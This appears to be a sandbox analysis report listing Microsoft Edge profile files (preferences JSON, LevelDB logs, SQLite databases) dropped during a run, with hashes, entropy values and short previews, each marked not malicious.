                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):17560
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.487012078269556
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:st8J99QTryDigabatSuypFscTIJZn4kcSoiA1jC31/8hlUKuV85UbV+F1olQw3l5:st8PGKSu4FscTiZnGe3yRUbG1CQwD
                                                                                                                                                                                                                                                                                          MD5:88303EC8CB143142859EDA52A50F1B3B
                                                                                                                                                                                                                                                                                          SHA1:6D22AA4873E8E153FFD495751F47ADB44D48880A
                                                                                                                                                                                                                                                                                          SHA-256:BBB085A788C2AB865A864C71C423E2C764DDC783D9C7ABB036459BEF603BEE34
                                                                                                                                                                                                                                                                                          SHA-512:6B3E19FA6EFAD05DEC2AFB28AE6493EDC7AB38DA2720FE3D5319952C59B3D2BA17A28CD3E15185DB53518FE08E6BC7813EA78EEA9117B59CFFD906E310C7BEBC
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380044129800999","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340970644573687","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\71c833ad-d922-43a5-9d39-81c53e0bc001.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (17725), with no line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):17726
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.4837564778515056
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:st8J99QTryDigabatSuypFscTIJZn4kcSoiA1jC31/8hlUKuV85UbV+F1olQw3bl:st8PGKSu4FscTiZnGe3yRUbG1CQwrl
                                                                                                                                                                                                                                                                                          MD5:0C6AB1452F977E95D52E67DB1AB060C2
                                                                                                                                                                                                                                                                                          SHA1:C4F1D958513BB3731473A939AF523E6C4526849F
                                                                                                                                                                                                                                                                                          SHA-256:9A1B04B160D3F80535F85837437D06A57CF1CDC5B81FAA3BE19CFB4C8E6FA9C9
                                                                                                                                                                                                                                                                                          SHA-512:5870F9831A2FA5EAAAD6DDE590E059679C72804322BA123AC0AD0EC11B9B2D20573CF12132828F820E8281D40A340B207199DF3A3DEBDA231A5EB902C8B3FF85
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380044129800999","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340970644573687","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\73126c60-3b1a-4f00-a325-151812250d75.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):11501
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.2305056518486
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:st8kdpFscTIJZn4kaWSoRJV85UbV+F1olQw3lYsPgYJ:st8QFscTiZnEUbG1CQwD
                                                                                                                                                                                                                                                                                          MD5:DBA28EEB6E8BDE5142574E59CD663A29
                                                                                                                                                                                                                                                                                          SHA1:4B7210508B7FE7E6515565FD26147B5F470E4D20
                                                                                                                                                                                                                                                                                          SHA-256:FD4DD25E227ACAF0C54E6FC3888C020AFE7D13A1264782EA7F5F7F6EB8911E00
                                                                                                                                                                                                                                                                                          SHA-512:3E5C20D497A137387CB1A6BCD85417C16810A266B80E09E4D6C06DDA255E30062C305DA9E4898C238A6C40FF755F4CBA482DFBA74529C4000305E13081F008A0
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380044129800999","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340970644573687","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\97128260-9d69-4f39-991f-b9043bda1155.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):40504
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.560815761350038
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:768:c/dyz67pLGLhYyWPjPfl38F1+UoAYDCx9Tuqh0VfUC9xbog/OVem34Q4Erw3Dq4o:c/dyzSchYyWPjPfl3u1jaPm3r4d324Ir
                                                                                                                                                                                                                                                                                          MD5:5AB96EF4EFB0F1F320BB462E5056AEC7
                                                                                                                                                                                                                                                                                          SHA1:D44E57674E6258524EE57E71F58CDD5D064FB108
                                                                                                                                                                                                                                                                                          SHA-256:297116FBEC11C276C54BBAC36005F1B1C95A3D46EB37CC6DEBF2B8609D704CCB
                                                                                                                                                                                                                                                                                          SHA-512:D58EF81FB4757F710863BEF33D59715A759B683F08B1C8FABBD13253E966F0677F61A9BABD3E38D57E20B92D9428E21A21A0A1B23A505DB20DF5EF02C112486C
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13380044129103691","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13380044129103691","location":5,"ma

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000001.dbtmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):16
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                          MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                          SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                          SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                          SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000003.log

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):33
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.5394429593752084
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:iWstvhYNrkUn:iptAd
                                                                                                                                                                                                                                                                                          MD5:F27314DD366903BBC6141EAE524B0FDE
                                                                                                                                                                                                                                                                                          SHA1:4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
                                                                                                                                                                                                                                                                                          SHA-256:68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
                                                                                                                                                                                                                                                                                          SHA-512:07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:...m.................DB_VERSION.1

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\CURRENT (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):16
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                          MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                          SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                          SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                          SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\LOG

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):303
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.239723910058546
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:5bM8ZD1qLTwi23oH+Tcwtp3hBtB2KLlrbMSnq2PqLTwi23oH+Tcwtp3hBWsIFUv:y8Z2wZYebp3dFL6ov8wZYebp3eFUv
                                                                                                                                                                                                                                                                                          MD5:F5BF7CBF929B48163B66936E7A8485FF
                                                                                                                                                                                                                                                                                          SHA1:34FF28810A2312D44E057F2E8EA8EFDD468548EC
                                                                                                                                                                                                                                                                                          SHA-256:7EE31116697727813F18C30AAC1008EB45BA239900CBB7331B9825F43CAADC0B
                                                                                                                                                                                                                                                                                          SHA-512:2CFE4FCBA6158C4ADF13F9053A3AB9624857FB5FF0B8B6009BC2F63F28414E80FE27C4F68F5A78702AD933BE31F5C68ADD0352D53B50CB23D02AE9DC4B40F2A4
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/30-09:55:35.349 d20 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db since it was missing..2024/12/30-09:55:35.665 d20 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db/MANIFEST-000001.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\MANIFEST-000001

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):41
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                          MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                          SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                          SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                          SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000003.log

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                                                                                          Size (bytes):1696115
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.040611509359593
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24576:7Af76gGkISshcFdmcOAoPENUpifYP+MbI2T:7AfgAmmE
                                                                                                                                                                                                                                                                                          MD5:69013ABF4658B3A0922308DA8258BAEB
                                                                                                                                                                                                                                                                                          SHA1:8D9959BCBE1530A577094F1BC8F1FEE1977F1008
                                                                                                                                                                                                                                                                                          SHA-256:B76AB9A4B96CB29169BB2E646BC4410E285F1F7D8C90319130C29873769C5779
                                                                                                                                                                                                                                                                                          SHA-512:C2C2461A2C66C460A0AD18420589C0BBCD7D27FD7F0C4FBF028111E6C140795613FC7FC73CC3C6F944BEE9E9CEC01947BFE5A2C0833711F30B9382FE04181530
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:...m.................DB_VERSION.1acT..................QUERY_TIMESTAMP:arbitration_priority_list4.*.*.13340969984833782.$QUERY:arbitration_priority_list4.*.*..[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=NtPyTqjbjPElpw2mWa%2FwOk1no4JFJEK8%2BwO4xQdDJO4%3D&st=2021-01-01T00%3A00%3A00Z&se=2023-12-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"N0MkrPHaUyfTgQSPaiVpHemLMcVgqoPh/xUYLZyXayg=","size":11749}]...................'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.[{. "configVersion": 32,. "PrivilegedExperiences": [. "ShorelinePrivilegedExperienceID",. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",. "SHOPPING_AUTO_SHOW_BING_SEARCH",. "SHOPPING_AUTO_SHOW_REBATES",. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",. "SHOPPING_AUTO_SHOW_REBATES_DEACTI

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):332
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.102001151707388
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:5bMTSAQyq2PqLTwi23oH+Tcwt9Eh1tIFUt8MbMSNAG1Zmw+MbM1LAQRkwOqLTwiH:yTzQyv8wZYeb9Eh16FUt8xSSg/+x10Ql
                                                                                                                                                                                                                                                                                          MD5:AB75B2F3CE1578585F6827BFB90BC337
                                                                                                                                                                                                                                                                                          SHA1:058719EF5707A28AD51C3E44A873864FDF81CB66
                                                                                                                                                                                                                                                                                          SHA-256:6347420CF45AD6EBF96F2AABDAA89A99738FE4E8CF0D220215333D67A62020E7
                                                                                                                                                                                                                                                                                          SHA-512:B480419A3D0F18FD06386B0AEB112ED4795E7E22688F1E7E5FCA45B8FDE4FD8257A1404DAFB75D858ECADD22A3407180C42934A614344F06779CE844F342C2A7
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/30-09:55:35.539 2094 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/12/30-09:55:35.542 2094 Recovering log #3.2024/12/30-09:55:35.545 2094 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG.old (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):332
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.102001151707388
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:5bMTSAQyq2PqLTwi23oH+Tcwt9Eh1tIFUt8MbMSNAG1Zmw+MbM1LAQRkwOqLTwiH:yTzQyv8wZYeb9Eh16FUt8xSSg/+x10Ql
                                                                                                                                                                                                                                                                                          MD5:AB75B2F3CE1578585F6827BFB90BC337
                                                                                                                                                                                                                                                                                          SHA1:058719EF5707A28AD51C3E44A873864FDF81CB66
                                                                                                                                                                                                                                                                                          SHA-256:6347420CF45AD6EBF96F2AABDAA89A99738FE4E8CF0D220215333D67A62020E7
                                                                                                                                                                                                                                                                                          SHA-512:B480419A3D0F18FD06386B0AEB112ED4795E7E22688F1E7E5FCA45B8FDE4FD8257A1404DAFB75D858ECADD22A3407180C42934A614344F06779CE844F342C2A7
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/30-09:55:35.539 2094 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/12/30-09:55:35.542 2094 Recovering log #3.2024/12/30-09:55:35.545 2094 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DIPS

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):28672
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.4621019367864196
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfBu4:TouQq3qh7z3bY2LNW9WMcUvBu4
                                                                                                                                                                                                                                                                                          MD5:294A9C6116D438F9CEA01981DD49AFA2
                                                                                                                                                                                                                                                                                          SHA1:4B126BB8D74FF37606DF29C2FF145E577FABC5E2
                                                                                                                                                                                                                                                                                          SHA-256:F48923B331716853B5C6AAD27587FCBE677D3F07C96017108CC0053683FA1EAC
                                                                                                                                                                                                                                                                                          SHA-512:2EF4C21FC8B7DE68D784BD54E4E60BBDF9E244D51962FD87F8834F6363E3B760FCB20C30A85E23F9B16E9023F85B651A2CF62FEB5934972E2165E81BDADD87E0
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g.....8...n................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DashTrackerDatabase

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):10240
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.8708334089814068
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:LBtW4mqsmvEFUU30dZV3lY7+YNbr1dj3BzA2ycFUxOUDaazMvbKGxiTUwZ79GV:LLaqEt30J2NbDjfy6UOYMvbKGxjgm
                                                                                                                                                                                                                                                                                          MD5:92F9F7F28AB4823C874D79EDF2F582DE
                                                                                                                                                                                                                                                                                          SHA1:2D4F1B04C314C79D76B7FF3F50056ECA517C338B
                                                                                                                                                                                                                                                                                          SHA-256:6318FCD9A092D1F5B30EBD9FB6AEC30B1AEBD241DC15FE1EEED3B501571DA3C7
                                                                                                                                                                                                                                                                                          SHA-512:86FEF0E05F871A166C3FAB123B0A4B95870DCCECBE20B767AF4BDFD99653184BBBFE4CE1EDF17208B7700C969B65B8166EE264287B613641E7FDD55A6C09E6D4
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j...v... .. .....M....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):341
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.174872008643293
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:5beX7Iq2PqLTwi23oH+TcwtnG2tMsIFUt8MbewZmw+MbeRTvDkwOqLTwi23oH+TR:q7Iv8wZYebn9GFUt8U/+FvD5TwZYebnB
                                                                                                                                                                                                                                                                                          MD5:637B68026314A70FAF5A766C1481CAB1
                                                                                                                                                                                                                                                                                          SHA1:1D52FB849EA79F79003BDD779A8CE6FFEC102548
                                                                                                                                                                                                                                                                                          SHA-256:70FF8BC5B6F56550C8E4DCC4AA967912FC114683D2B16B1DF90CCB36D7CBFABB
                                                                                                                                                                                                                                                                                          SHA-512:FC3E6070F3E976782F377BCD24E1670430A2BE03AA365696B7EC2F8AA7C298067CD101F8EB013A9A041C7715982429C8DEE8B9035FFD4682F2EBC70816CAEFFA
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/30-09:55:29.192 190 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/12/30-09:55:29.193 190 Recovering log #3.2024/12/30-09:55:29.194 190 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG.old (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):341
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.174872008643293
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:5beX7Iq2PqLTwi23oH+TcwtnG2tMsIFUt8MbewZmw+MbeRTvDkwOqLTwi23oH+TR:q7Iv8wZYebn9GFUt8U/+FvD5TwZYebnB
                                                                                                                                                                                                                                                                                          MD5:637B68026314A70FAF5A766C1481CAB1
                                                                                                                                                                                                                                                                                          SHA1:1D52FB849EA79F79003BDD779A8CE6FFEC102548
                                                                                                                                                                                                                                                                                          SHA-256:70FF8BC5B6F56550C8E4DCC4AA967912FC114683D2B16B1DF90CCB36D7CBFABB
                                                                                                                                                                                                                                                                                          SHA-512:FC3E6070F3E976782F377BCD24E1670430A2BE03AA365696B7EC2F8AA7C298067CD101F8EB013A9A041C7715982429C8DEE8B9035FFD4682F2EBC70816CAEFFA
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/30-09:55:29.192 190 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/12/30-09:55:29.193 190 Recovering log #3.2024/12/30-09:55:29.194 190 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeHubAppUsage\EdgeHubAppUsageSQLite.db

                                                                                                                                                                                                                                                                                          Download File
